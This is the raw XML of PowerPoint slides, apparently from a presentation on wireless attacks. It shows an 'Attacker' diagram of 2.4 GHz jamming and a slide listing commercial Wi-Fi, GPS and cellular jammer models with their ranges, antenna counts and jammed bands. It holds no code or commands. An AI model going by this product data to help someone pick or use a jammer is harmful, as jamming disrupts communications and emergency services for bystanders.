                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B8D316-7AF9-4325-B7BD-DC4A91F2E7E9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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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7" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{080FF19B-DF3A-4E3E-92C7-58F862CCDE23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174661" y="949014"/>
                <a:ext cx="2104624" cy="2101493"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A76694FC-1239-498B-8E89-82CEB4FA4CC7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342017" y="1116120"/>
                <a:ext cx="1769913" cy="1767280"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C7D50C3-C9BD-419C-925B-A9A93345C82C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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8BAFCD-F06D-49B7-BD0B-23E8A42B2FB8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="676728" y="1450334"/>
                <a:ext cx="1100490" cy="1098853"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12155315-AF7B-4D21-A39D-754610D0BD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860668" y="1634000"/>
                <a:ext cx="732610" cy="731520"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE91F935-91B6-4124-86BB-B95E780BEE0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black">
              <a:xfrm>
                <a:off x="1043821" y="1816880"/>
                <a:ext cx="366305" cy="365760"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="49000"/>
                  </a:schemeClr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0C0C0">
                        <a:alpha val="50000"/>
                      </a:srgbClr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C0C0C0">
                          <a:gamma/>
                          <a:shade val="60000"/>
                          <a:invGamma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pic>
          <p:nvPicPr>
            <p:cNvPr id="78" name="Picture 4" descr="E:\haja Premium\Rejection.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7199485-22A0-4F48-B489-BC6F46DD74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55100" y="3486820"/>
              <a:ext cx="1504939" cy="150493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ED05EC89-6AFE-423C-AAEC-0CE5FDC49A61}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7141803" y="5802316"/>
              <a:ext cx="715837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Attacker</a:t>
              </a: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E76E066E-3F50-4E08-B223-1D24E228EA71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7891229" y="4148158"/>
              <a:ext cx="122842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Attacker </a:t>
              </a:r>
              <a:b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</a:b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sending 2.4 GHz jamming signals</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="81" name="Picture 4" descr="E:\haja Premium\Rejection.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D7FBE3A-753F-47D6-ACC4-E796FCCEFF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444809" y="3486820"/>
              <a:ext cx="1504939" cy="150493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680B0EB-C026-486D-908E-AC3CAAE75B80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6777464" y="2935041"/>
              <a:ext cx="2239728" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow" w="med" len="me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106C2777-858E-4800-86BA-495D05D00C4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7897328" y="2981998"/>
              <a:ext cx="0" cy="1861731"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0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1153B3D3-9DA8-4C31-9BDF-E6FA410AD781}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7825653" y="5802316"/>
              <a:ext cx="925042" cy="46166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Jamming Device</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="85" name="Picture 84" descr="A close up of a logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A60CAB-87EE-425F-911E-CE03A6E4BE26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165343" y="4952640"/>
              <a:ext cx="668756" cy="860613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0178188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DBAA3DF6-FD55-4A1E-9593-C942701F2CE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="243840"/>
            <a:ext cx="9909175" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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>
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:sys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Wi-Fi Jamming Devices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12E12F59-FEFD-48F8-A601-AFFC4819B361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="252933" y="1202412"/>
            <a:ext cx="3718432" cy="24228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>
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst/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072922C-579E-4CDA-89CE-E8DEE2DEEA49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4230498" y="1202412"/>
            <a:ext cx="3718432" cy="242287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9050">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst/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5C0A323-E3C1-4789-B176-FC086177E76E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8208064" y="1202412"/>
            <a:ext cx="3718432" cy="24228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>
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/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86606D1-4C85-443A-BF52-2F863056BF51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="252933" y="3899118"/>
            <a:ext cx="3718432" cy="24228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>
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst/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ABEAD7B-FB30-4554-901D-F5FFBD4F9790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4230498" y="3899118"/>
            <a:ext cx="3718432" cy="242287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9050">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst/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EA3656BD-6C0E-4450-B4E1-9325C4359EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8208064" y="3899118"/>
            <a:ext cx="3718432" cy="24228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>
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/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CC8F1FFE-5537-415E-AC7E-BF4C6BDF2177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608123" y="1272924"/>
            <a:ext cx="3008052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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CPB-3016N-E5G Jammer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8B007890-5BEC-415B-82F3-5ED9CE0DD696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724911" y="1683856"/>
            <a:ext cx="2118883" cy="1846659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225425" marR="0" lvl="0" indent="-225425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Range: 50 - 150 meters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" marR="0" lvl="0" indent="-225425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6 antennas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Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="225425" marR="0" lvl="0" indent="-225425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6 frequency bands jammed (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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CDMA - GSM - 3G - Wi-Fi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/Bluetooth)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lt"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="225425" marR="0" lvl="0" indent="-225425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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Wall-mountable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EC4B31B-B7DB-463B-9992-FB8D6196262E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972093" y="1272924"/>
            <a:ext cx="2235243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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PCB-2040 Jammer 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A1F0A34D-4774-4BDF-A3C1-2F76F193347C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5597719" y="1683856"/>
            <a:ext cx="2351210" cy="1846659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Range: 20 - 50 meters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4 antennas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Calibri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4 frequency bands jammed (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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2G - 3G - 4G – GPS - Wi-Fi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)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lt"/>
              <a:cs typeface="Calibri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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Working time: 40 minutes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Calibri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5A90830A-30DE-40DE-9703-F94BA5415D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8988940" y="1272924"/>
            <a:ext cx="2156681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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CPB-2060B Jammer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935B94F1-6608-4185-8E4D-5B3A234F3AC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9593350" y="1683856"/>
            <a:ext cx="2420850" cy="1846659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Range: 10 - 40 meters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6 antennas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6 frequency bands jammed (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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>GPS - 4G - Wi-Fi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)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lt"/>
              <a:cs typeface="Calibri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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Internal battery: 2.5 – 3.0 hours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Calibri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4756623F-9C2D-44C2-B574-60D4E6EF8E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8723290" y="3963046"/>
            <a:ext cx="2687980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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CPB-2680H-AGP Jammer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65E6852-2BAC-4591-8E5F-1E47074BE0A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9593351" y="4421398"/>
            <a:ext cx="2112459" cy="1846659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Range: 20 - 60 meters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8 antennas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8 frequency bands jammed (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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CDMA - GPS - DCS - 3G - 4G - Wi-Fi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)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Calibri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Wall-mountable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2C08913A-4CD4-4161-9C56-02D22BA0B349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5056736" y="3963046"/>
            <a:ext cx="2065956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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CPB-2061 Jammer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842102B9-4D9D-4234-9367-E7E8D1F9FAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5597718" y="4421398"/>
            <a:ext cx="2351211" cy="1846659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Range: 10 - 40 meters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6 antennas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6 frequency bands jammed (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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Mobile - Wi-Fi - GPS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)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lt"/>
              <a:cs typeface="Calibri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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Wall-mountable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75CBF025-79D5-4145-BC62-BEBF77866A0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724025" y="3963046"/>
            <a:ext cx="2776249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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CPB-2660H-A4G Jammer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926766F0-4EE1-4932-9A59-A4E90BFC5E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724911" y="4421398"/>
            <a:ext cx="2099901" cy="1846659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Range: 20 - 60 meters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6 antennas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Calibri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6 Frequency bands jammed (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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CDMA - DCS - 3G - 4G - Wi-Fi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)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Calibri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Blip>
                <a:blip r:embed="rId2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Wall-mountable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A963C91D-82EA-4592-AF55-613B4EB08B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10244164" y="6320221"/>
            <a:ext cx="1770036" cy="246221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lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>http://www.techwisetech.com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lt"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 9" descr="A close up of a device&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33C59519-D9B3-4B25-BC92-0C74A531C7E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8333" r="10138"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="330591" y="2010515"/>
            <a:ext cx="1211437" cy="150461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</p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 15" descr="A picture containing indoor&#10;&#10;Description generated with high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75B653F6-5974-4415-85CC-F25846B1176F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1754" r="13274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4346619" y="1987888"/>
            <a:ext cx="1134980" cy="1527239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</p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 23" descr="A close up of a device&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C7E4D73-B168-40D1-A94B-D80334CD2E3D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11972" r="10041"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8319896" y="1988026"/>
            <a:ext cx="1181081" cy="1527101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</p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 31" descr="A close up of a device&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A110664-64E0-4E36-9762-6F4C6DE63C8C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13466" r="13466"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="344208" y="4614097"/>
            <a:ext cx="1127480" cy="1630746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</p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 37" descr="A close up of a device&#10;&#10;Description generated with high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51F6E58-51D7-4F45-8DD3-23AB1F0C3447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11750" r="6328"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358459" y="4772255"/>
            <a:ext cx="1127902" cy="140246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</p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 17" descr="A close up of an object&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5826AFC-23E5-49CC-B006-942F8A6B0D6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect l="13461" r="10784"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8334919" y="4791311"/>
            <a:ext cx="1103985" cy="145353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</p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370691517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roup 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D4034D-2CA2-43FC-B377-9EBFB6F950D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8060422" y="4392301"/>
            <a:ext cx="3976028" cy="984970"/>
            <a:chOff x="9691313" y="2247258"/>
            <a:chExt cx="3373922" cy="984970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Freeform 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE182F66-33AD-46B4-B3B5-2A18AB925F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2055961" y="2418158"/>
              <a:ext cx="1009274" cy="814070"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1837"/>
                <a:gd name="T1" fmla="*/ 0 h 1954"/>
                <a:gd name="T2" fmla="*/ 0 w 1837"/>
                <a:gd name="T3" fmla="*/ 0 h 1954"/>
                <a:gd name="T4" fmla="*/ 1836 w 1837"/>
                <a:gd name="T5" fmla="*/ 0 h 1954"/>
                <a:gd name="T6" fmla="*/ 1836 w 1837"/>
                <a:gd name="T7" fmla="*/ 1825 h 1954"/>
                <a:gd name="T8" fmla="*/ 0 w 1837"/>
                <a:gd name="T9" fmla="*/ 1825 h 1954"/>
                <a:gd name="T10" fmla="*/ 0 w 1837"/>
                <a:gd name="T11" fmla="*/ 0 h 1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37" h="1954">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="137"/>
                    <a:pt x="1234" y="137"/>
                    <a:pt x="1836" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="611"/>
                    <a:pt x="1836" y="1214"/>
                    <a:pt x="1836" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1234" y="1953"/>
                    <a:pt x="603" y="1953"/>
                    <a:pt x="0" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1214"/>
                    <a:pt x="0" y="611"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8E8E8"/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defTabSz="91421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1B292A17-7783-424D-8070-BD830ACE259F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9691313" y="2247258"/>
              <a:ext cx="2672030" cy="931679"/>
              <a:chOff x="9691313" y="2247258"/>
              <a:chExt cx="2672030" cy="931679"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="81" name="Freeform 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E344829-CF8D-4EA3-A650-21C819556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12055961" y="2247258"/>
                <a:ext cx="307382" cy="931679"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 558 w 559"/>
                  <a:gd name="T1" fmla="*/ 2236 h 2237"/>
                  <a:gd name="T2" fmla="*/ 0 w 559"/>
                  <a:gd name="T3" fmla="*/ 1817 h 2237"/>
                  <a:gd name="T4" fmla="*/ 0 w 559"/>
                  <a:gd name="T5" fmla="*/ 0 h 2237"/>
                  <a:gd name="T6" fmla="*/ 558 w 559"/>
                  <a:gd name="T7" fmla="*/ 420 h 2237"/>
                  <a:gd name="T8" fmla="*/ 558 w 559"/>
                  <a:gd name="T9" fmla="*/ 2236 h 2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9" h="2237">
                    <a:moveTo>
                      <a:pt x="558" y="2236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="2236"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8">
                  <a:lumMod val="75000"/>
                </a:srgb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defTabSz="91421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" name="Freeform 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B804077F-3715-4208-9883-B31E6BFA5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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="162F3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21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" name="Text Box 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA3F1CF-903B-48EC-97A9-568F25314B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flipH="1">
                <a:off x="10310914" y="2440210"/>
                <a:ext cx="1776513" cy="35466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/>
              <a:lstStyle>
                <a:lvl1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1pPr>
                <a:lvl2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2pPr>
                <a:lvl3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3pPr>
                <a:lvl4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4pPr>
                <a:lvl5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5pPr>
                <a:lvl6pPr marL="2514600" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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6pPr>
